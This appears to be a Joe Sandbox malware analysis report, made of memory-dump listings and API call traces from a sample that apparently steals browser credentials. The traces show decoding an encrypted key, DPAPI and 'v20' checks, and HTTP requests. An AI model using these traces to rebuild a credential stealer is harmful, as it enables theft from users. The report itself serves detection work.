                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                                • String ID:
                                                                                                • API String ID: 2775534915-0
                                                                                                • Opcode ID: 758fee104ac8deea31483978b3f596230ba7669fd82ede4edbd6f751ab8f3e45
                                                                                                • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                                                                                • Opcode Fuzzy Hash: 758fee104ac8deea31483978b3f596230ba7669fd82ede4edbd6f751ab8f3e45
                                                                                                • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: ance$ate$ence$iti$ive$ize$ous
                                                                                                • API String ID: 1475443563-1713922985
                                                                                                • Opcode ID: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
                                                                                                • Instruction ID: a6745917a23cee73da34d97950539bfd860ce037a133a9b2c34405b562b65f13
                                                                                                • Opcode Fuzzy Hash: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
                                                                                                • Instruction Fuzzy Hash: 90C127B0E083068BDB00DF94C58669EBBF4AF85348F31C81ED890DB754D779D5A68B92
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00974020,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                                                                                • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                                                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                                                                                • StrStrA.SHLWAPI(?,00973F00,00420B56), ref: 0040CBF7
                                                                                                • StrStrA.SHLWAPI(00000000,00973F30), ref: 0040CC1E
                                                                                                • StrStrA.SHLWAPI(?,00974340,00000000,?,00421550,00000000,?,00000000,00000000,?,0096C2B8,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                                                                                • StrStrA.SHLWAPI(00000000,00974520), ref: 0040CDB9
                                                                                                  • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                                                                                  • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0096C398), ref: 0040C971
                                                                                                  • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                                                                  • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                                                                                • StrStrA.SHLWAPI(?,00974520,00000000,?,00421554,00000000,?,00000000,0096C398), ref: 0040CE5A
                                                                                                • StrStrA.SHLWAPI(00000000,0096C508), ref: 0040CE71
                                                                                                  • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                                                                  • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                                                                  • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                                                                • String ID:
                                                                                                • API String ID: 1564132460-3916222277
                                                                                                • Opcode ID: 8709eecf1a42231e7a8c988e9ebd6b9a3b86df2585319a07ee50d62771e0678a
                                                                                                • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                                                                                • Opcode Fuzzy Hash: 8709eecf1a42231e7a8c988e9ebd6b9a3b86df2585319a07ee50d62771e0678a
                                                                                                • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcessstrtok_s
                                                                                                • String ID: block
                                                                                                • API String ID: 3407564107-2199623458
                                                                                                • Opcode ID: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                                                                                • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                                                                                • Opcode Fuzzy Hash: 1f0f84f1c6c132a16ad49c43e162cf8975f1175bc1bc8b8d234cf50fd6cc2e6d
                                                                                                • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                  • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00976668), ref: 00406353
                                                                                                  • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                  • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                  • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                  • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                                                                  • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                                                                • strtok.MSVCRT(00000000,?), ref: 004155EE
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                                                                                • API String ID: 3532888709-2643084821
                                                                                                • Opcode ID: b61c4c89f9994b5c984b5bf237e3171df766cefd4c1e86929edb5afb8fd3dece
                                                                                                • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                                                                                • Opcode Fuzzy Hash: b61c4c89f9994b5c984b5bf237e3171df766cefd4c1e86929edb5afb8fd3dece
                                                                                                • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                                                                                APIs
                                                                                                • strtok_s.MSVCRT ref: 00411557
                                                                                                • strtok_s.MSVCRT ref: 004119A0
                                                                                                  • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                  • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: strtok_s$lstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 348468850-0
                                                                                                • Opcode ID: 1daaeda73675648e445032a392a540dd0da9cb6deb57e6634cfbc1c142934181
                                                                                                • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                                                                                • Opcode Fuzzy Hash: 1daaeda73675648e445032a392a540dd0da9cb6deb57e6634cfbc1c142934181
                                                                                                • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 004144EE
                                                                                                • memset.MSVCRT ref: 00414505
                                                                                                  • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                                                                                • lstrcatA.KERNEL32(?,00975FC0), ref: 0041455B
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                                                                                • lstrcatA.KERNEL32(?,00973F60), ref: 00414583
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                  • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                                                                  • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                                                                  • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                  • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                  • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                  • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                  • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                  • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                  • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                                                                                • StrStrA.SHLWAPI(?,00975F00), ref: 00414643
                                                                                                • GlobalFree.KERNEL32(?), ref: 00414762
                                                                                                  • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                  • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                  • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                  • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                  • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                                                                                • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                                                                                • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                                                                                • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 1191620704-0
                                                                                                • Opcode ID: 02513212d47ca0910353f274b1dd42a9c60e4222ad3b8c8228f08e1041f009a1
                                                                                                • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                                                                                • Opcode Fuzzy Hash: 02513212d47ca0910353f274b1dd42a9c60e4222ad3b8c8228f08e1041f009a1
                                                                                                • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                                                                                APIs
                                                                                                • memcmp.MSVCRT ref: 61E97281
                                                                                                  • Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: freememcmp
                                                                                                • String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
                                                                                                • API String ID: 1183899719-1341641573
                                                                                                • Opcode ID: a4619ef3427869a35f6bfc4a872bcdda3baedda7772fcac0fbc76971867d68f5
                                                                                                • Instruction ID: 0d5b731b4e6e71452f02b40a28acc7cf76705435dae47c5a45c9821af7cd2139
                                                                                                • Opcode Fuzzy Hash: a4619ef3427869a35f6bfc4a872bcdda3baedda7772fcac0fbc76971867d68f5
                                                                                                • Instruction Fuzzy Hash: AE12E774E04259DBDB04CF98D480A9DBBF2BF88308F25C869E855AB351D774E886CF81
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: strncmp
                                                                                                • String ID: -$-$0$]$false$null$true$}
                                                                                                • API String ID: 1114863663-1443276563
                                                                                                • Opcode ID: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
                                                                                                • Instruction ID: 7d0d7d581299a88f4ecf4101ed3cb2921062378b47abb911dec42016596cbabc
                                                                                                • Opcode Fuzzy Hash: 4366ec816b9fce7022b57502cc8f689d133e39cff5fe7996cab8ff7cfed47eb1
                                                                                                • Instruction Fuzzy Hash: 4BD1DF70B482768ADB12CFA8C4443DABBF2AFCA318F69C25BD4919B281D739D446C751
                                                                                                APIs
                                                                                                • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                                                                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
